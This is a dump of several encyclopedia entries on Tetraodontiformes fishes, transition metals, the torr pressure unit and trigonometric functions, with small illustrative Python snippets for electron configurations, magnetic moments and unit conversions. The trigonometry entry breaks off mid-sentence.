Tetraodontiformes include a variety of body shapes, all radical departures from the streamlined body plan typical of most fishes. These forms range from nearly square or triangular (boxfishes) and globose (pufferfishes) to laterally compressed (filefishes and triggerfishes). They range in size from Rudarius excelsus (a filefish), measuring just about 2 cm in length, to the ocean sunfish, the largest of all bony fishes, reaching some 3 m in length and weighing over 2 tonnes.

Most members of this order – except for the family Balistidae – are ostraciiform swimmers, meaning the body is rigid and incapable of lateral flexure. Because of this, they are slow-moving and rely on their pectoral, dorsal, anal, and caudal fins for propulsion rather than body undulation. However, movement is usually quite precise; dorsal and anal fins aid in manoeuvring and stabilizing. In most species, all fins are simple, small, and rounded, except for the pelvic fins which, if present, are fused and buried. Again, in most members, the gill plates are covered over with skin, the only gill opening being a small slit above the pectoral fin.
The tetraodontiform strategy seems to be defense at the expense of speed, with all species fortified with scales modified into strong plates or spines – or with tough, leathery skin (the filefishes and ocean sunfish). Another striking defensive attribute found in the pufferfishes and porcupinefishes is the ability to inflate their bodies to greatly increase their normal diameter; this is accomplished by sucking water into a diverticulum of the stomach. Many species of the Tetraodontidae, Triodontidae, and Diodontidae are further protected from predation by tetrodotoxin, a powerful neurotoxin concentrated in the animals' internal organs.

Tetraodontiforms have highly modified skeletons, with no nasal, parietal, infraorbital, or (usually) lower rib bones. The bones of the jaw are modified and fused into a sort of "beak"; visible sutures divide the beaks into "teeth". This is alluded to in their name, derived from the Greek tetra, meaning "four", and odous, meaning "tooth", and the Latin forma, meaning "shape". Counting these teeth-like bones is a way of distinguishing similar families, for example the Tetraodontidae ("four-toothed"), Triodontidae ("three-toothed"), and Diodontidae ("two-toothed"). Their jaws are aided by powerful muscles, and many species also have pharyngeal teeth to further process prey items, because the Tetraodontiformes prey mostly on hard-shelled invertebrates, such as crustaceans and shellfish.

The Molidae are conspicuous even within this oddball order; they lack swim bladders and spines, and are propelled by their very tall dorsal and anal fins. The caudal peduncle is absent and the caudal fin is reduced to a stiff rudder-like structure. Molids are pelagic rather than reef-associated and feed on soft-bodied invertebrates, especially jellyfish.

Families

The Tetraodontiformes contains the following suborders and families:

Suborder Plectocretacicoidei Tyler & Sorbini, 1996
Family Cretatriacanthidae Tyler & Sorbini, 1996
Family Plectocretacicidae Tyler & Sorbini, 1996
Family Protriacanthidae Tyler & Sorbini, 1996
Suborder Triodontoidei Bleeker, 1859
Genus †Ctenoplectus Close, Johanson, Tyler, Harrington & Friedman, 2016
Family Triodontidae Bleeker, 1859
Suborder Triacanthoidei Tyler, 1968
Family Triacanthodidae Gill, 1862
Subfamily Hollardiinae Tyler, 1968
Subfamily Triacanthodinae Gill, 1862
Family Triacanthidae Bleeker, 1859
Suborder Ostracioidea Rafinesque, 1810
Family †Spinacanthidae Santini & Tyler, 2003
Family Aracanidae Hollard, 1860
Family Ostraciidae Rafinesque, 1810
Suborder Balistoidei Rafinesque, 1810
Family Bolcabalistidae Santini & Tyler, 2003
Family Moclaybalistidae Santini & Tyler, 2003
Family Balistidae Rafinesque, 1810
Family Monacanthidae Nardo, 1843
Suborder Tetraodontoidei Berg, 1940
Genus †Iraniplectus Tyler, Mirzaie & Nazemi, 2006
Family †Avitoplectidae Bemis, Tyler, Bemis, Kumar, Rana & Smith, 2017
Family †Balkariidae Bannikov, Tyler, Arcila & Carnevale, 2016
Family †Eoplectidae Santini & Tyler, 2003
Family Molidae Bonaparte, 1835
Family Tetraodontidae Bonaparte, 1831
Subfamily Tetraodontinae Bonaparte, 1831
Subfamily Canthigastrinae Bleeker, 1865
Family Diodontidae Bonaparte, 1835
Family †Zignoichthyidae Tyler & Sorbini, 1996

† means extinct. This cladogram of extant Tetraodontiformes is based on Santini et al., 2013.

Timeline of genera
Biology and health sciences
Acanthomorpha
Animals
30364
https://en.wikipedia.org/wiki/Transition%20metal
Transition metal
In chemistry, a transition metal (or transition element) is a chemical element in the d-block of the periodic table (groups 3 to 12), though the elements of group 12 (and less often group 3) are sometimes excluded. The lanthanide and actinide elements (the f-block) are called inner transition metals and are sometimes considered to be transition metals as well. Since they are metals, they are lustrous and have good electrical and thermal conductivity. Most (with the exception of group 11 and group 12) are hard and strong, and have high melting and boiling temperatures. They form compounds in two or more different oxidation states and bind to a variety of ligands to form coordination complexes that are often coloured. They form many useful alloys and are often employed as catalysts in elemental form or in compounds such as coordination complexes and oxides. Most are strongly paramagnetic because of their unpaired d electrons, as are many of their compounds. All of the elements that are ferromagnetic near room temperature are transition metals (iron, cobalt and nickel) or inner transition metals (gadolinium). English chemist Charles Rugeley Bury (1890–1968) first used the word transition in this context in 1921, when he referred to a transition series of elements during the change of an inner layer of electrons (for example n = 3 in the 4th row of the periodic table) from a stable group of 8 to one of 18, or from 18 to 32. These elements are now known as the d-block. Definition and classification The 2011 IUPAC Principles of Chemical Nomenclature describe a "transition metal" as any element in groups 3 to 12 on the periodic table. This corresponds exactly to the d-block elements, and many scientists use this definition. In actual practice, the f-block lanthanide and actinide series are called "inner transition metals". The 2005 Red Book allows for the group 12 elements to be excluded, but the 2011 Principles do not. The IUPAC Gold Book defines a transition metal as "an element whose atom has a partially filled d sub-shell, or which can give rise to cations with an incomplete d sub-shell", but this definition is taken from an old edition of the Red Book and is no longer present in the current edition. In the d-block, the atoms of the elements have between zero and ten d electrons. Published texts and periodic tables show variation regarding the heavier members of group 3. The common placement of lanthanum and actinium in these positions is not supported by physical, chemical, and electronic evidence, which overwhelmingly favours putting lutetium and lawrencium in those places. Some authors prefer to leave the spaces below yttrium blank as a third option, but there is confusion about whether this format implies that group 3 contains only scandium and yttrium, or whether it also contains all the lanthanides and actinides; additionally, it creates a 15-element-wide f-block, even though quantum mechanics dictates that the f-block should only be 14 elements wide. The form with lutetium and lawrencium in group 3 is supported by a 1988 IUPAC report on physical, chemical, and electronic grounds, and again by a 2021 IUPAC preliminary report, as it is the only form that allows the simultaneous (1) preservation of the sequence of increasing atomic numbers, (2) a 14-element-wide f-block, and (3) avoidance of the split in the d-block. 
Argumentation purporting to defend the form with lanthanum and actinium in group 3 can still be found in the contemporary literature, but many authors consider it to be logically inconsistent (a particular point of contention being the differing treatment of actinium and thorium, which both can use 5f as a valence orbital but have no 5f occupancy as single atoms); the majority of investigators considering the problem agree with the updated form with lutetium and lawrencium. The group 12 elements zinc, cadmium, and mercury are sometimes excluded from the transition metals. This is because they have the electronic configuration [noble gas]d¹⁰s², where the d shell is complete, and they still have a complete d shell in all their known oxidation states. The group 12 elements Zn, Cd and Hg may therefore, under certain criteria, be classed as post-transition metals. However, it is often convenient to include these elements in a discussion of the transition elements. For example, when discussing the crystal field stabilization energy of first-row transition elements, it is convenient to also include the elements calcium and zinc, as both Ca²⁺ and Zn²⁺ have a value of zero, against which the value for other transition metal ions may be compared. Another example occurs in the Irving–Williams series of stability constants of complexes. Moreover, Zn, Cd, and Hg can use their d orbitals for bonding even though they are not known in oxidation states that would formally require breaking open the d-subshell, which sets them apart from the p-block elements. The 2007 (though disputed and so far not reproduced independently) synthesis of mercury(IV) fluoride (HgF₄) has been taken by some to reinforce the view that the group 12 elements should be considered transition metals, but some authors still consider this compound to be exceptional. Copernicium is expected to be able to use its d electrons for chemistry, as its 6d subshell is destabilised by strong relativistic effects due to its very high atomic number, and as such is expected to have transition-metal-like behaviour and show higher oxidation states than +2 (which are not definitely known for the lighter group 12 elements). Even in bare dications, Cn²⁺ is predicted to be 6d⁸7s², unlike Hg²⁺, which is 5d¹⁰6s⁰. Although meitnerium, darmstadtium, and roentgenium are within the d-block and are expected to behave as transition metals analogous to their lighter congeners iridium, platinum, and gold, this has not yet been experimentally confirmed. Whether copernicium behaves more like mercury or has properties more similar to those of the noble gas radon is not clear. The relative inertness of Cn would come from the relativistically expanded 7s–7p1/2 energy gap, which is already adumbrated in the 6s–6p1/2 gap for Hg, weakening metallic bonding and causing its well-known low melting and boiling points. Transition metals with lower or higher group numbers are described as 'earlier' or 'later', respectively. When described in a two-way classification scheme, early transition metals are on the left side of the d-block, from group 3 to group 7, and late transition metals are on the right side of the d-block, from group 8 to 11 (or 12, if the group 12 elements are counted as transition metals). In an alternative three-way scheme, groups 3, 4, and 5 are classified as early transition metals; 6, 7, and 8 as middle transition metals; and 9, 10, and 11 (and sometimes group 12) as late transition metals. 
The heavy group 2 elements calcium, strontium, and barium do not have filled d-orbitals as single atoms, but are known to have d-orbital bonding participation in some compounds, and for that reason have been called "honorary" transition metals. Probably the same is true of radium. The f-block elements La–Yb and Ac–No have chemical activity of the (n−1)d shell, but importantly also have chemical activity of the (n−2)f shell that is absent in d-block elements. Hence they are often treated separately as inner transition elements. Electronic configuration The general electronic configuration of the d-block atoms is [noble gas](n − 1)d⁰⁻¹⁰ns⁰⁻²np⁰⁻¹. Here "[noble gas]" is the electronic configuration of the last noble gas preceding the atom in question, and n is the highest principal quantum number of an occupied orbital in that atom. For example, Ti (Z = 22) is in period 4, so that n = 4; the first 18 electrons have the same configuration as Ar at the end of period 3, and the overall configuration is [Ar]3d²4s². The period 6 and 7 transition metals also add core (n − 2)f¹⁴ electrons, which are omitted from the tables below. The p orbitals are almost never filled in free atoms (the one exception being lawrencium, due to relativistic effects that become important at such high Z), but they can contribute to the chemical bonding in transition metal compounds. The Madelung rule predicts that the inner d orbital is filled after the valence-shell s orbital. The typical electronic structure of transition metal atoms is then written as [noble gas]ns²(n − 1)dᵐ. This rule is approximate, but holds for most of the transition metals. Even when it fails for the neutral ground state, it accurately describes a low-lying excited state. The d subshell is the next-to-last subshell and is denoted as the (n − 1)d subshell. The number of s electrons in the outermost s subshell is generally one or two, except for palladium (Pd), which has no electron in that s subshell in its ground state. The s subshell in the valence shell is represented as the ns subshell, e.g. 4s. In the periodic table, the transition metals are present in ten groups (3 to 12). The elements in group 3 have an ns²(n − 1)d¹ configuration, except for lawrencium (Lr): its 7s²7p¹ configuration exceptionally does not fill the 6d orbitals at all. The first transition series is present in the 4th period, and starts after Ca (Z = 20) of group 2 with the configuration [Ar]4s², or scandium (Sc), the first element of group 3 with atomic number Z = 21 and configuration [Ar]4s²3d¹, depending on the definition used. As we move from left to right, electrons are added to the same d subshell until it is complete. Since the electrons added fill the (n − 1)d orbitals, the properties of the d-block elements are quite different from those of s- and p-block elements, in which the filling occurs either in s or in p orbitals of the valence shell. The electronic configurations of the individual elements present in all the d-block series are given below: A careful look at the electronic configurations of the elements reveals that there are certain exceptions to the Madelung rule. For Cr, as an example, the rule predicts the configuration 3d⁴4s², but the observed atomic spectra show that the real ground state is 3d⁵4s¹. To explain such exceptions, it is necessary to consider the effects of increasing nuclear charge on the orbital energies, as well as the electron–electron interactions, including both Coulomb repulsion and exchange energy. 
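The Madelung filling order just described is mechanical enough to express in a few lines of code. The following Python sketch is a supplementary illustration, not part of the original article; the function name and the n ≤ 8 cutoff are arbitrary choices, and, as the surrounding text explains, the idealized rule it implements gets atoms such as Cr and Cu wrong.

```python
# A minimal sketch of the Madelung (Aufbau) rule: fill subshells in order of
# increasing n + l, breaking ties by lower n. It predicts *idealized* ground
# states only; real exceptions such as Cr (3d5 4s1) are not captured.

def madelung_configuration(z: int) -> str:
    """Predicted idealized ground-state configuration for atomic number z."""
    letters = "spdfghi"  # subshell labels for l = 0..6
    # Enumerate subshells (n, l), sorted by (n + l, n) per the Madelung rule.
    subshells = sorted(
        ((n, l) for n in range(1, 9) for l in range(min(n, len(letters)))),
        key=lambda nl: (nl[0] + nl[1], nl[0]),
    )
    parts, remaining = [], z
    for n, l in subshells:
        if remaining <= 0:
            break
        electrons = min(remaining, 2 * (2 * l + 1))  # a subshell holds 2(2l+1)
        parts.append(f"{n}{letters[l]}{electrons}")
        remaining -= electrons
    return " ".join(parts)

print(madelung_configuration(22))  # Ti: 1s2 2s2 2p6 3s2 3p6 4s2 3d2
print(madelung_configuration(24))  # Cr predicted ...4s2 3d4; observed is 3d5 4s1
```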
The exceptions are in any case not very relevant for chemistry, because the energy difference between them and the expected configuration is always quite low. The (n − 1)d orbitals that are involved in the transition metals are very significant because they influence such properties as magnetic character, variable oxidation states, formation of coloured compounds, etc. The valence s and p orbitals (ns and np) contribute very little in this regard, since they hardly change in moving from left to right across a transition series. In transition metals, there are greater horizontal similarities in the properties of the elements in a period, in comparison to the periods in which the d orbitals are not involved. This is because, in a transition series, the valence shell electronic configuration of the elements does not change. However, there are some group similarities as well. Characteristic properties There are a number of properties shared by the transition elements that are not found in other elements, which result from the partially filled d shell. These include:
the formation of compounds whose colour is due to d–d electronic transitions;
the formation of compounds in many oxidation states, due to the relatively low energy gap between different possible oxidation states;
the formation of many paramagnetic compounds, due to the presence of unpaired d electrons (a few compounds of main-group elements are also paramagnetic, e.g. nitric oxide and oxygen).
Most transition metals can be bound to a variety of ligands, allowing for a wide variety of transition metal complexes. Coloured compounds Colour in transition-series metal compounds is generally due to electronic transitions of two principal types. The first is the charge-transfer transition. An electron may jump from a predominantly ligand orbital to a predominantly metal orbital, giving rise to a ligand-to-metal charge-transfer (LMCT) transition. These can most easily occur when the metal is in a high oxidation state. For example, the colour of chromate, dichromate and permanganate ions is due to LMCT transitions. Another example is that mercuric iodide, HgI₂, is red because of an LMCT transition. A metal-to-ligand charge-transfer (MLCT) transition will be most likely when the metal is in a low oxidation state and the ligand is easily reduced. In general, charge-transfer transitions result in more intense colours than d–d transitions. The second type is the d–d transition, in which an electron jumps from one d orbital to another. In complexes of the transition metals, the d orbitals do not all have the same energy. The pattern of splitting of the d orbitals can be calculated using crystal field theory. The extent of the splitting depends on the particular metal, its oxidation state and the nature of the ligands. The actual energy levels are shown on Tanabe–Sugano diagrams. In centrosymmetric complexes, such as octahedral complexes, d–d transitions are forbidden by the Laporte rule and only occur because of vibronic coupling, in which a molecular vibration occurs together with a d–d transition. Tetrahedral complexes have somewhat more intense colour because mixing d and p orbitals is possible when there is no centre of symmetry, so transitions are not pure d–d transitions. The molar absorptivity (ε) of bands caused by d–d transitions is relatively low, roughly in the range 5–500 M⁻¹cm⁻¹ (where M = mol dm⁻³). Some d–d transitions are spin forbidden. 
An example occurs in octahedral, high-spin complexes of manganese(II), which has a d⁵ configuration in which all five electrons have parallel spins; the colour of such complexes is much weaker than in complexes with spin-allowed transitions. Many compounds of manganese(II) appear almost colourless. The spectrum of [Mn(H₂O)₆]²⁺ shows a maximum molar absorptivity of about 0.04 M⁻¹cm⁻¹ in the visible spectrum. Oxidation states A characteristic of transition metals is that they exhibit two or more oxidation states, usually differing by one. For example, compounds of vanadium are known in all oxidation states between −1, such as , and +5, such as . Main-group elements in groups 13 to 18 also exhibit multiple oxidation states. The "common" oxidation states of these elements typically differ by two instead of one. For example, compounds of gallium in oxidation states +1 and +3 exist in which there is a single gallium atom. Compounds of Ga(II) would have an unpaired electron and would behave as a free radical and generally be destroyed rapidly, but some stable radicals of Ga(II) are known. Gallium also has a formal oxidation state of +2 in dimeric compounds, such as , which contain a Ga–Ga bond formed from the unpaired electron on each Ga atom. Thus the main difference in oxidation states between transition elements and other elements is that oxidation states are known in which there is a single atom of the element and one or more unpaired electrons. The maximum oxidation state in the first-row transition metals is equal to the number of valence electrons from titanium (+4) up to manganese (+7), but decreases in the later elements. In the second row, the maximum occurs with ruthenium (+8), and in the third row, the maximum occurs with iridium (+9). In compounds such as and , the elements achieve a stable configuration by covalent bonding. The lowest oxidation states are exhibited in metal carbonyl complexes such as (oxidation state zero) and (oxidation state −2), in which the 18-electron rule is obeyed. These complexes are also covalent. Ionic compounds are mostly formed with oxidation states +2 and +3. In aqueous solution, the ions are hydrated by (usually) six water molecules arranged octahedrally. Magnetism Transition metal compounds are paramagnetic when they have one or more unpaired d electrons. In octahedral complexes with between four and seven d electrons, both high-spin and low-spin states are possible. Tetrahedral transition metal complexes such as are high spin because the crystal field splitting is small, so that the energy to be gained by virtue of the electrons being in lower-energy orbitals is always less than the energy needed to pair up the spins. Some compounds are diamagnetic. These include octahedral, low-spin, d⁶ and square-planar d⁸ complexes. In these cases, crystal field splitting is such that all the electrons are paired up. Ferromagnetism occurs when individual atoms are paramagnetic and the spin vectors are aligned parallel to each other in a crystalline material. Metallic iron and the alloy alnico are examples of ferromagnetic materials involving transition metals. Antiferromagnetism is another example of a magnetic property arising from a particular alignment of individual spins in the solid state. Catalytic properties The transition metals and their compounds are known for their homogeneous and heterogeneous catalytic activity. This activity is ascribed to their ability to adopt multiple oxidation states and to form complexes. 
Vanadium(V) oxide (in the contact process), finely divided iron (in the Haber process), and nickel (in catalytic hydrogenation) are some examples. Catalysts at a solid surface (nanomaterial-based catalysts) involve the formation of bonds between reactant molecules and atoms of the surface of the catalyst (first-row transition metals utilize 3d and 4s electrons for bonding). This has the effect of increasing the concentration of the reactants at the catalyst surface and also of weakening the bonds in the reacting molecules (the activation energy is lowered). Also, because transition metal ions can change their oxidation states, they become more effective as catalysts. An interesting type of catalysis occurs when the products of a reaction catalyse the reaction, producing more catalyst (autocatalysis). One example is the reaction of oxalic acid with acidified potassium permanganate (or manganate(VII)). Once a little Mn²⁺ has been produced, it can react with MnO₄⁻, forming Mn³⁺. This then reacts with C₂O₄²⁻ ions, forming Mn²⁺ again. Physical properties As implied by the name, all transition metals are metals and thus conductors of electricity. In general, transition metals possess a high density and high melting points and boiling points. These properties are due to metallic bonding by delocalized d electrons, leading to cohesion which increases with the number of shared electrons. However, the group 12 metals have much lower melting and boiling points, since their full d subshells prevent d–d bonding, which again tends to differentiate them from the accepted transition metals. Mercury has a melting point of about −39 °C and is a liquid at room temperature.
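As a supplement to the Magnetism section above, the link between unpaired d electrons and paramagnetism can be quantified with the spin-only magnetic moment, μ = √(n(n + 2)) Bohr magnetons for n unpaired electrons. This is a standard textbook relation rather than one stated in the article, and the sketch below is only a minimal illustration of it:

```python
# A minimal sketch of the textbook spin-only moment, mu = sqrt(n(n + 2)) in
# Bohr magnetons (BM), which ties the paramagnetism discussed above to the
# number of unpaired d electrons. Supplementary to the article text.
from math import sqrt

def spin_only_moment(unpaired: int) -> float:
    """Spin-only magnetic moment in Bohr magnetons for n unpaired electrons."""
    return sqrt(unpaired * (unpaired + 2))

# High-spin d5 Mn(II) has five unpaired electrons; low-spin d6 has none
# (diamagnetic, mu = 0), matching the qualitative statements in the text.
for n in (0, 1, 3, 5):
    print(f"{n} unpaired electron(s): mu = {spin_only_moment(n):.2f} BM")
```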
Physical sciences
Chemical element groups
null
30366
https://en.wikipedia.org/wiki/Torr
Torr
The torr (symbol: Torr) is a unit of pressure based on an absolute scale, defined as exactly 1/760 of a standard atmosphere (101325 Pa). Thus one torr is exactly 101325/760 pascals (≈ 133.32 Pa). Historically, one torr was intended to be the same as one "millimeter of mercury", but subsequent redefinitions of the two units made the torr marginally lower (by less than 0.000015%). The torr is not part of the International System of Units (SI). Even so, it is often combined with the metric prefix milli to name one millitorr (mTorr), equal to 0.001 Torr. The unit was named after Evangelista Torricelli, an Italian physicist and mathematician who discovered the principle of the barometer in 1644. Nomenclature and common errors The unit name torr is written in lower case, while its symbol ("Torr") is always written with an uppercase initial, including in combinations with prefixes and other unit symbols, as in "mTorr" (millitorr) or "Torr⋅L/s" (torr-litres per second). The symbol (uppercase) should be used with prefix symbols (thus, mTorr and millitorr are correct, but mtorr and milliTorr are not). The torr is sometimes incorrectly denoted by the symbol "T", which is the SI symbol for the tesla, the unit measuring the strength of a magnetic field. Although frequently encountered, the alternative spelling "Tor" is incorrect. History Torricelli attracted considerable attention when he demonstrated the first mercury barometer to the general public. He is credited with giving the first modern explanation of atmospheric pressure. Scientists at the time were familiar with small fluctuations in height that occurred in barometers. When these fluctuations were explained as a manifestation of changes in atmospheric pressure, the science of meteorology was born. Over time, 760 millimeters of mercury at 0 °C came to be regarded as the standard atmospheric pressure. In honour of Torricelli, the torr was defined as a unit of pressure equal to one millimeter of mercury at 0 °C. However, since the acceleration due to gravity – and thus the weight of a column of mercury – is a function of elevation and latitude (due to the rotation and non-sphericity of the Earth), this definition is imprecise and varies by location. In 1954, the definition of the atmosphere was revised by the 10th General Conference on Weights and Measures to the currently accepted definition: one atmosphere is equal to 101325 pascals. The torr was then redefined as 1/760 of one atmosphere. This yields a precise definition that is unambiguous and independent of measurements of the density of mercury or the acceleration due to gravity on Earth. Manometric units of pressure Manometric units are units such as millimeters of mercury or centimeters of water that depend on an assumed density of a fluid and an assumed acceleration due to gravity. The use of these units is discouraged. Nevertheless, manometric units are routinely used in medicine and physiology, and they continue to be used in areas as diverse as weather reporting and scuba diving. Conversion factors The millimeter of mercury is, by definition, 133.322387415 Pa (13.5951 g/cm³ × 9.80665 m/s² × 1 mm), computed from conventional values for the density of mercury and standard gravity. The torr is defined as 1/760 of one standard atmosphere, while the atmosphere is defined as 101325 pascals. Therefore, 1 Torr is equal to 101325/760 Pa. The decimal form of this fraction (133.322368421052631578947…) is an infinitely long, periodically repeating decimal (repetend length: 18). 
The relationship between the torr and the millimeter of mercury is: 1 Torr ≈ 0.999999858 mmHg and 1 mmHg ≈ 1.000000142 Torr. The difference between one millimeter of mercury and one torr, as well as between one atmosphere (101.325 kPa) and 760 mmHg (101.3250144354 kPa), is less than one part in seven million (or less than 0.000015%). This small difference is negligible for all practical purposes. In the European Union, the millimeter of mercury is instead defined as 1 mmHg = 133.322 Pa, hence under that definition 1 Torr ≈ 1.0000028 mmHg and 1 mmHg ≈ 0.9999972 Torr. Other units of pressure include: the bar (symbol: bar), defined as 100 kPa exactly, and the atmosphere (symbol: atm), defined as 101.325 kPa exactly. These four pressure units are used in different settings. For example, the bar is used in meteorology to report atmospheric pressures. The torr is used in high-vacuum physics and engineering.
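Because both units are defined exactly, the conversion arithmetic above can be checked with exact rational numbers. The following sketch (supplementary to the article; it only assumes Python's standard fractions module) verifies that 1 Torr = 101325/760 Pa and that the torr and the millimeter of mercury differ by well under one part in seven million:

```python
# A minimal check of the exact definitions quoted above.
from fractions import Fraction

TORR_IN_PA = Fraction(101325, 760)            # exact: 1/760 of 101325 Pa
MMHG_IN_PA = Fraction(133322387415, 10**9)    # 1 mmHg = 133.322387415 Pa

print(float(TORR_IN_PA))                      # 133.32236842105263
ratio = MMHG_IN_PA / TORR_IN_PA               # mmHg expressed in Torr
print(float(ratio - 1))                       # ~1.42e-07, i.e. < 1/7,000,000
```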
Physical sciences
Pressure
Basics and measurement
30367
https://en.wikipedia.org/wiki/Trigonometric%20functions
Trigonometric functions
In mathematics, the trigonometric functions (also called circular functions, angle functions or goniometric functions) are real functions which relate an angle of a right-angled triangle to ratios of two side lengths. They are widely used in all sciences that are related to geometry, such as navigation, solid mechanics, celestial mechanics, geodesy, and many others. They are among the simplest periodic functions, and as such are also widely used for studying periodic phenomena through Fourier analysis. The trigonometric functions most widely used in modern mathematics are the sine, the cosine, and the tangent functions. Their reciprocals are respectively the cosecant, the secant, and the cotangent functions, which are less used. Each of these six trigonometric functions has a corresponding inverse function, and an analog among the hyperbolic functions. The oldest definitions of trigonometric functions, related to right-angle triangles, define them only for acute angles. To extend the sine and cosine functions to functions whose domain is the whole real line, geometrical definitions using the standard unit circle (i.e., a circle with radius 1 unit) are often used; then the domain of the other functions is the real line with some isolated points removed. Modern definitions express trigonometric functions as infinite series or as solutions of differential equations. This allows extending the domain of sine and cosine functions to the whole complex plane, and the domain of the other trigonometric functions to the complex plane with some isolated points removed. Notation Conventionally, an abbreviation of each trigonometric function's name is used as its symbol in formulas. Today, the most common versions of these abbreviations are "sin" for sine, "cos" for cosine, "tan" or "tg" for tangent, "sec" for secant, "csc" or "cosec" for cosecant, and "cot" or "ctg" for cotangent. Historically, these abbreviations were first used in prose sentences to indicate particular line segments or their lengths related to an arc of an arbitrary circle, and later to indicate ratios of lengths, but as the function concept developed in the 17th–18th century, they began to be considered as functions of real-number-valued angle measures, and written with functional notation, for example . Parentheses are still often omitted to reduce clutter, but are sometimes necessary; for example the expression would typically be interpreted to mean so parentheses are required to express A positive integer appearing as a superscript after the symbol of the function denotes exponentiation, not function composition. For example and denote not This differs from the (historically later) general functional notation in which However, the exponent −1 is commonly used to denote the inverse function, not the reciprocal. For example and denote the inverse trigonometric function alternatively written The equation implies not In this case, the superscript could be considered as denoting a composed or iterated function, but negative superscripts other than −1 are not in common use. Right-angled triangle definitions If the acute angle θ is given, then any right triangles that have an angle of θ are similar to each other. This means that the ratio of any two side lengths depends only on θ. Thus these six ratios define six functions of θ, which are the trigonometric functions. 
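Before the formal definitions, a quick numerical check can make the side-ratio idea concrete. The sketch below is a supplementary illustration, not part of the original article; it uses a 3–4–5 right triangle and the hypotenuse/opposite/adjacent terminology spelled out in the next paragraph:

```python
# A minimal check that the right-angled triangle ratios agree with
# math.sin/cos/tan evaluated at the corresponding angle (in radians).
import math

opposite, adjacent = 3.0, 4.0
hypotenuse = math.hypot(opposite, adjacent)   # 5.0 for a 3-4-5 triangle
theta = math.atan2(opposite, adjacent)        # the acute angle, in radians

assert math.isclose(math.sin(theta), opposite / hypotenuse)
assert math.isclose(math.cos(theta), adjacent / hypotenuse)
assert math.isclose(math.tan(theta), opposite / adjacent)
print(math.degrees(theta))                    # ~36.87 degrees
```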
In the following definitions, the hypotenuse is the length of the side opposite the right angle, opposite represents the side opposite the given angle θ, and adjacent represents the side between the angle θ and the right angle. Various mnemonics can be used to remember these definitions. In a right-angled triangle, the sum of the two acute angles is a right angle, that is, 90° or π/2 radians. Therefore sin θ and cos(90° − θ) represent the same ratio, and thus are equal. This identity and analogous relationships between the other trigonometric functions are summarized in the following table. Radians versus degrees In geometric applications, the argument of a trigonometric function is generally the measure of an angle. For this purpose, any angular unit is convenient. One common unit is degrees, in which a right angle is 90° and a complete turn is 360° (particularly in elementary mathematics). However, in calculus and mathematical analysis, the trigonometric functions are generally regarded more abstractly as functions of real or complex numbers, rather than angles. In fact, the functions sin and cos can be defined for all complex numbers in terms of the exponential function, via power series, or as solutions to differential equations given particular initial values (see below), without reference to any geometric notions. The other four trigonometric functions (tan, cot, sec, csc) can be defined as quotients and reciprocals of sin and cos, except where zero occurs in the denominator. It can be proved, for real arguments, that these definitions coincide with elementary geometric definitions if the argument is regarded as an angle in radians. Moreover, these definitions result in simple expressions for the derivatives and indefinite integrals of the trigonometric functions. Thus, in settings beyond elementary geometry, radians are regarded as the mathematically natural unit for describing angle measures. When radians (rad) are employed, the angle is given as the length of the arc of the unit circle subtended by it: the angle that subtends an arc of length 1 on the unit circle is 1 rad (≈ 57.3°), and a complete turn (360°) is an angle of 2π (≈ 6.28) rad. For a real number x, the notation sin x, cos x, etc. refers to the value of the trigonometric functions evaluated at an angle of x rad. If units of degrees are intended, the degree sign must be explicitly shown (sin x°, cos x°, etc.). Using this standard notation, the argument x for the trigonometric functions satisfies the relationship x = (180x/π)°, so that, for example, sin π = sin 180° when we take x = π. In this way, the degree symbol can be regarded as a mathematical constant such that 1° = π/180 ≈ 0.0175. Unit-circle definitions The six trigonometric functions can be defined as coordinate values of points on the Euclidean plane that are related to the unit circle, which is the circle of radius one centered at the origin of this coordinate system. While right-angled triangle definitions allow for the definition of the trigonometric functions for angles between 0 and π/2 radians, the unit circle definitions allow the domain of trigonometric functions to be extended to all positive and negative real numbers. Let L be the ray obtained by rotating by an angle θ the positive half of the x-axis (counterclockwise rotation for θ > 0 and clockwise rotation for θ < 0). 
This ray intersects the unit circle at the point A. The ray L, extended to a line if necessary, intersects the line of equation x = 1 at point B, and the line of equation y = 1 at point C. The tangent line to the unit circle at the point A is perpendicular to L, and intersects the y- and x-axes at points D and E. The coordinates of these points give the values of all trigonometric functions for any arbitrary real value of θ in the following manner. The trigonometric functions cos θ and sin θ are defined, respectively, as the x- and y-coordinate values of point A. In the range 0 ≤ θ ≤ π/2, this definition coincides with the right-angled triangle definition, by taking the right-angled triangle to have the unit radius as hypotenuse. And since the equation x² + y² = 1 holds for all points P = (x, y) on the unit circle, this definition of cosine and sine also satisfies the Pythagorean identity. The other trigonometric functions can be found along the unit circle as the coordinates tan θ = y_B, cot θ = x_C, csc θ = y_D, and sec θ = x_E. By applying the Pythagorean identity and geometric proof methods, these definitions can readily be shown to coincide with the definitions of tangent, cotangent, secant and cosecant in terms of sine and cosine. Since a rotation of an angle of ±2π does not change the position or size of a shape, the points A, B, C, D, and E are the same for two angles whose difference is an integer multiple of 2π. Thus trigonometric functions are periodic functions with period 2π. That is, the equalities sin θ = sin(θ + 2kπ) and cos θ = cos(θ + 2kπ) hold for any angle θ and any integer k. The same is true for the four other trigonometric functions. By observing the sign and the monotonicity of the functions sine, cosine, cosecant, and secant in the four quadrants, one can show that 2π is the smallest value for which they are periodic (i.e., 2π is the fundamental period of these functions). However, after a rotation by an angle π, the points B and C already return to their original position, so that the tangent function and the cotangent function have a fundamental period of π. That is, the equalities tan θ = tan(θ + kπ) and cot θ = cot(θ + kπ) hold for any angle θ and any integer k. Algebraic values The algebraic expressions for the most important angles are as follows: (zero angle) (right angle) Writing the numerators as square roots of consecutive non-negative integers, with a denominator of 2, provides an easy way to remember the values. Such simple expressions generally do not exist for other angles which are rational multiples of a right angle. For an angle which, measured in degrees, is a multiple of three, the exact trigonometric values of the sine and the cosine may be expressed in terms of square roots. These values of the sine and the cosine may thus be constructed by ruler and compass. For an angle of an integer number of degrees, the sine and the cosine may be expressed in terms of square roots and the cube root of a non-real complex number. Galois theory allows a proof that, if the angle is not a multiple of 3°, non-real cube roots are unavoidable. For an angle which, expressed in degrees, is a rational number, the sine and the cosine are algebraic numbers, which may be expressed in terms of nth roots. This results from the fact that the Galois groups of the cyclotomic polynomials are cyclic. For an angle which, expressed in degrees, is not a rational number, then either the angle or both the sine and the cosine are transcendental numbers. This is a corollary of Baker's theorem, proved in 1966. Simple algebraic values The following table lists the sines, cosines, and tangents of multiples of 15 degrees from 0 to 90 degrees. Definitions in analysis G. H. 
